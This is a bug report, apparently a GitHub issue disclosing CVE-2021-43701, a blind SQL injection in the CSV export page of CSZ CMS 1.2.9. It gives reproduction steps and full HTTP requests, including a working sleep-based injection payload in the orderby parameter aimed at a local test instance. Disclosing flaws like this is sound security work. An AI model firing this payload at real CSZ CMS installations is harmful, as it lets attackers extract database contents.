Headline
CVE-2021-43701: Bug Report: Blind SQL Injection Vulnerability · Issue #31 · cskaza/cszcms
CSZ CMS 1.2.9 has a Time and Boolean-based Blind SQL Injection vulnerability in the endpoint /admin/export/getcsv/article_db, via the fieldS[] and orderby parameters.
Description:
I found Blind SQL Injection vulnerability in your CMS (version_1.2.9) “export” page. It refers to an injection attack where an attacker can execute malicious SQL statements that control a web application’s database server.
CMS Version:
1.2.9
Affected URL:
http://127.0.0.1/admin/export
Steps to Reproduce:
- At first login your panel
- then go to “General Menu > CSV Export / Import”
- then select any Table Name and Select Fields. so your request data will be
GET /CSZCMS/admin/export/getcsv/article_db?fieldS%5B%5D=article_db_id&orderby=article_db_id&sort=ASC&submit=Export+to+CSV HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0 Waterfox/56.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8080/CSZCMS/admin/export/article_db
Cookie: _ga=GA1.1.2106075763.1616578884; _pk_id.39.dc78=a6fc2902298b2ea4.1616578885.2.1616584112.1616584112.; back_to_admin=http%3A//127.0.0.1%3A8080/latest/admin/; mw-back-to-live-edit=true; show-sidebar-layouts=1; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=1%7CBAvqukS6679ewJxXOtVLBjexrDL7YqJvXggGnu2KyFWLhlDug5YVpb73EpNB%7C%242y%2410%248iuh7Co7azrDdHytSwJcmOenP.Q6xQmX0vmOiYNhu8PeouVHMpuaa; cszcookie_b54b1631aee51cb5309f41e2a09fec82csrf_cookie_csz=fb9f7d8059850bb0ad61e99c643f3e8a; b54b1631aee51cb5309f41e2a09fec82_cszsess=7pbpjbv1fkbu918ojs9424325ql2dioa
Connection: close
Upgrade-Insecure-Requests: 1
- "fieldS[]" or "orderby" parameter is vulnerable. Let’s try to inject Blind SQL Injection use this query "(select(0)from(select(sleep(10)))a)" in “orderby” parameter. You request data will be
GET /CSZCMS/admin/export/getcsv/article_db?fieldS%5B%5D=article_db_id&orderby=(select(0)from(select(sleep(10)))a)&sort=ASC&submit=Export+to+CSV HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0 Waterfox/56.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8080/CSZCMS/admin/export/article_db
Cookie: _ga=GA1.1.2106075763.1616578884; _pk_id.39.dc78=a6fc2902298b2ea4.1616578885.2.1616584112.1616584112.; back_to_admin=http%3A//127.0.0.1%3A8080/latest/admin/; mw-back-to-live-edit=true; show-sidebar-layouts=1; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=1%7CBAvqukS6679ewJxXOtVLBjexrDL7YqJvXggGnu2KyFWLhlDug5YVpb73EpNB%7C%242y%2410%248iuh7Co7azrDdHytSwJcmOenP.Q6xQmX0vmOiYNhu8PeouVHMpuaa; cszcookie_b54b1631aee51cb5309f41e2a09fec82csrf_cookie_csz=fb9f7d8059850bb0ad61e99c643f3e8a; b54b1631aee51cb5309f41e2a09fec82_cszsess=7pbpjbv1fkbu918ojs9424325ql2dioa
Connection: close
Upgrade-Insecure-Requests: 1
Proof of Concept:
You can see the Proof of Concept. which I’ve attached a video to confirm the vulnerability.
Blind.SQL.Injection.mp4
Impact:
An attacker could extract information from database.
Let me know if any further info is required.
Thanks & Regards
Rahad Chowdhury
Cyber Security Specialist
BugsBD Limited
https://www.linkedin.com/in/rahadchowdhury/